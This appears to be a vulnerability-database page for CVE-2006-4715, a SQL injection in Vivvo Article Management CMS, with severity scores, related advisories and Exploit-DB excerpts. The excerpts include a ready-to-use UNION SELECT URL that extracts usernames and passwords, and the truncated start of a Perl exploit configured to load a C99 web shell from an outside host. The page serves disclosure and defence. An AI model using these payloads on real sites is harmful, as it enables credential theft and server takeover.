CVE-2006-4715
published 2006-09-12CVE-2006-4715: SQL injection vulnerability in pdf_version.php in SpoonLabs Vivvo Article Management CMS (aka phpWordPress) 3.2 and earlier allows remote attackers to execute…
PriorityP339high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
2.56%
83.1th percentile
SQL injection vulnerability in pdf_version.php in SpoonLabs Vivvo Article Management CMS (aka phpWordPress) 3.2 and earlier allows remote attackers to execute arbitrary SQL commands via the id parameter.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| spoonlabs | vivvo_article_management_cms | <= 3.25 | — |
| spoonlabs | vivvo_article_management_cms | — | — |
| spoonlabs | vivvo_article_management_cms | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-j59f-g7rp-mm5g: SQL injection vulnerability in pdf_version
ghsa_unreviewed·2022-05-01
CVE-2006-4715 [HIGH] GHSA-j59f-g7rp-mm5g: SQL injection vulnerability in pdf_version
SQL injection vulnerability in pdf_version.php in SpoonLabs Vivvo Article Management CMS (aka phpWordPress) 3.2 and earlier allows remote attackers to execute arbitrary SQL commands via the id parameter.
GHSA
GHSA-hgq5-c9r4-vxm9: SQL injection vulnerability in rss/show_webfeed
ghsa_unreviewed·2022-05-01·CVSS 7.5
CVE-2007-0574 [HIGH] GHSA-hgq5-c9r4-vxm9: SQL injection vulnerability in rss/show_webfeed
SQL injection vulnerability in rss/show_webfeed.php in SpoonLabs Vivvo Article Management CMS (aka phpWordPress) 3.40 allows remote attackers to execute arbitrary SQL commands via the wcHeadlines parameter, a different vector than CVE-2006-4715. NOTE: The provenance of this information is unknown; the details are obtained solely from third party information.
No detection rules found.
Exploit-DB
Vivvo CMS 3.4 - Multiple Vulnerabilities
exploitdb·2008-10-19
CVE-2007-3939 Vivvo CMS 3.4 - Multiple Vulnerabilities
Vivvo CMS 3.4 - Multiple Vulnerabilities
---
#!/usr/bin/perl
#Vivvo CMS Destroyer
#[email protected]
#By Xianur0
#-------------CREDITS-------------
#http://milw0rm.com/exploits/4192
#http://milw0rm.com/exploits/3326
#http://milw0rm.com/exploits/2339
#http://milw0rm.com/exploits/2337
#-------------/CREDITS-------------
print "\n Vivvo CMS Destroyer By Xianur0\n";
#-----------CONFIG----------
$SHELL='http://y4m15p33dy.vilabol.uol.com.br/c99.txt';
$textshell = 'C99Shell v.';
#----------/CONFIG----------
use LWP::UserAgent;
use Switch;
my $path = $ARGV[0];
$path = shift || &uso;
sub uso { print "\nUse: vivvo.pl [URI to Vivvo CMS]\n"; exit;}
$ua = LWP::UserAgent->new;
$ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.17) Gecko/20080829 Firefox/2.0.0.17");
$req = HTTP::Request->
Exploit-DB
Vivvo Article Manager 3.2 - 'id' SQL Injection
exploitdb·2006-09-09
CVE-2006-4715 Vivvo Article Manager 3.2 - 'id' SQL Injection
Vivvo Article Manager 3.2 - 'id' SQL Injection
---
############################################################
#MercilessTurk [email protected]
############################################################
#App Name: phpWordPress (Vivvo Article Manager)
#App Author: vivvo.net
#App Version: <=3.2
############################################################
#Vulnerable Code in pdf_version.php :
#line 19: $aid=secure_sql($_GET['id']);
#line 20: $query="SELECT * from tblArticles where id=$aid";
#secure_sql function doesn't block all sql injection attacks.
############################################################
#You will need a pdf reader.
#SQL Injection String:
#http://[target]/[path]/pdf_version.php?id=-1%20UNION%20SELECT%201,2,3,password,5,6,username,8,9,10,11,12,13,14,15,16,17,18
No writeups or analysis indexed.
http://secunia.com/advisories/21855http://securitydot.net/xpl/exploits/vulnerabilities/articles/1464/exploit.htmlhttp://www.securityfocus.com/bid/19934http://www.vupen.com/english/advisories/2006/3548https://exchange.xforce.ibmcloud.com/vulnerabilities/28833https://www.exploit-db.com/exploits/2337http://secunia.com/advisories/21855http://securitydot.net/xpl/exploits/vulnerabilities/articles/1464/exploit.htmlhttp://www.securityfocus.com/bid/19934http://www.vupen.com/english/advisories/2006/3548https://exchange.xforce.ibmcloud.com/vulnerabilities/28833https://www.exploit-db.com/exploits/2337
2006-09-12
Published